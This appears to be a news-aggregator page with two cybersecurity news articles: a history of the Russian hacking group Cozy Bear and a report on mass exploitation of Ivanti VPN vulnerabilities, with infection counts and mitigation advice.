The pair of disclosures, coming within five days of each other, may create the impression that there has been a recent flurry of hacking activity. But Cozy Bear has actually been one of the most active nation-state groups since at least 2010. In the intervening 14 years, it has waged an almost constant series of attacks, mostly on the networks of governmental organizations and the technology companies that supply them. Multiple intelligence services and private research companies have attributed the hacking group as an arm of Russia’s Foreign Intelligence Service, also known as the SVR.

The life and times of Cozy Bear (so far)

In its earliest years, Cozy Bear operated in relative obscurity—precisely the domain it prefers—as it hacked mostly Western governmental agencies and related organizations such as political think tanks and governmental subcontractors. In 2013, researchers from security firm Kaspersky unearthed MiniDuke, a sophisticated piece of malware that had taken hold of 60 government agencies, think tanks, and other high-profile organizations in 23 countries, including the US, Hungary, Ukraine, Belgium, and Portugal.

MiniDuke was notable for its odd combination of advanced programming and the gratuitous references to literature found embedded into its code. (It contained strings that alluded to Dante Alighieri’s Divine Comedy and to 666, the Mark of the Beast discussed in a verse from the Book of Revelation.) Written in assembly, employing multiple levels of encryption, and relying on hijacked Twitter accounts and automated Google searches to maintain stealthy communications with command-and-control servers, MiniDuke was among the most advanced pieces of malware found at the time.

It wasn’t immediately clear who was behind the mysterious malware—another testament to the stealth of its creators. In 2015, however, researchers linked MiniDuke—and seven other pieces of previously unidentified malware—to Cozy Bear. After a half-decade of lurking, the shadowy group was suddenly brought into the light of day.

Cozy Bear once again came to prominence the following year when researchers discovered the group (along with Fancy Bear, a separate Russian-state hacking group) inside the servers of the Democratic National Committee, looking for intelligence such as opposition research into Donald Trump, the Republican nominee for president at the time. The hacking group resurfaced in the days following Trump’s election victory that year with a major spear-phishing blitz that targeted dozens of organizations in government, military, defense contracting, media, and other industries.

One of Cozy Bear’s crowning achievements came in late 2020 with the discovery of an extensive supply chain attack that targeted customers of SolarWinds, the Austin, Texas, maker of network management tools. After compromising SolarWinds’ software build system, the hacking group pushed infected updates to roughly 18,000 customers. The hackers then used the updates to compromise nine federal agencies and about 100 private companies, White House officials have said.

Cozy Bear has remained active, with multiple campaigns coming to light in 2021, including one that used zero-day vulnerabilities to infect fully updated iPhones. Last year, the group devoted much of its time to hacks of Ukraine.

The life and times of Cozy Bear, the Russian hackers who just hit Microsoft and HPE Read More »


Mass exploitation of Ivanti VPNs is infecting networks around the globe


Orgs that haven’t acted yet should, even if it means suspending VPN services.

Cybercriminals or anonymous hackers use malware on mobile phones to hack personal and business passwords online.

Enlarge / Cybercriminals or anonymous hackers use malware on mobile phones to hack personal and business passwords online.

Getty Images

Hackers suspected of working for the Chinese government are mass exploiting a pair of critical vulnerabilities that give them complete control of virtual private network appliances sold by Ivanti, researchers said.

As of Tuesday morning, security company Censys detected 492 Ivanti VPNs that remained infected out of 26,000 devices exposed to the Internet. More than a quarter of the compromised VPNs—121—resided in the US. The three countries with the next biggest concentrations were Germany, with 26, South Korea, with 24, and China, with 21.


Microsoft’s customer cloud service hosted the most infected devices with 13, followed by cloud environments from Amazon with 12, and Comcast at 10.


“We conducted a secondary scan on all Ivanti Connect Secure servers in our dataset and found 412 unique hosts with this backdoor, Censys researchers wrote. “Additionally, we found 22 distinct ‘variants’ (or unique callback methods), which could indicate multiple attackers or a single attacker evolving their tactics.”

In an email, members of the Censys research team said evidence suggests that the people infecting the devices are motivated by espionage objectives. That theory aligns with reports published recently by security firms Volexity and Mandiant. Volexity researchers said they suspect the threat actor, tracked as UTA0178, is a “Chinese nation-state-level threat actor.” Mandiant, which tracks the attack group as UNC5221, said the hackers are pursuing an “espionage-motivated APT campaign.”

All civilian governmental agencies have been mandated to take corrective action to prevent exploitation. Federal Civilian Executive Branch agencies had until 11: 59 pm Monday to follow the mandate, which was issued Friday by the Cybersecurity and Infrastructure Security Agency. Ivanti has yet to release patches to fix the vulnerabilities. In their absence, Ivanti, CISA, and security companies are urging affected users to follow mitigation and recovery guidance provided by Ivanti that include preventative measures to block exploitation and steps for customers to rebuild and upgrade their systems if they detect exploitation.

“This directive is no surprise, considering the worldwide mass exploitation observed since Ivanti initially revealed the vulnerabilities on January 10,” Censys researchers wrote. “These vulnerabilities are particularly serious given the severity, widespread exposure of these systems, and the complexity of mitigation—especially given the absence of an official patch from the vendor as of the current writing.

When Avanti disclosed the vulnerabilities on January 10, the company said it would release patches on a staggered basis starting this week. The company has not issued a public statement since confirming the patch was still on schedule.

VPNs are an ideal device for hackers to infect because the always-on appliances sit at the very edge of the network, where they accept incoming connections. Because the VPNs must communicate with broad parts of the internal network, hackers who compromise the devices can then expand their presence to other areas. When exploited in unison, the vulnerabilities, tracked as CVE-2023-46805 and CVE-2024-21887, allow attackers to remotely execute code on servers. All supported versions of the Ivanti Connect Secure—often abbreviated as ICS and formerly known as Pulse Secure—are affected.

The ongoing attacks use the exploits to install a host of malware that acts as a backdoor. The hackers then use the malware to harvest as many credentials as possible belonging to various employees and devices on the infected network and to rifle around the network. Despite the use of this malware, the attackers largely employ an approach known as “living off the land,” which uses legitimate software and tools so they’re harder to detect.

The posts linked above from Volexity and Mandiant provide extensive descriptions of how the malware behaves and methods for detecting infections.

Given the severity of the vulnerabilities and the consequences that follow when they’re exploited, all users of affected products should prioritize mitigation of these vulnerabilities, even if that means temporarily suspending VPN usage.

Mass exploitation of Ivanti VPNs is infecting networks around the globe Read More »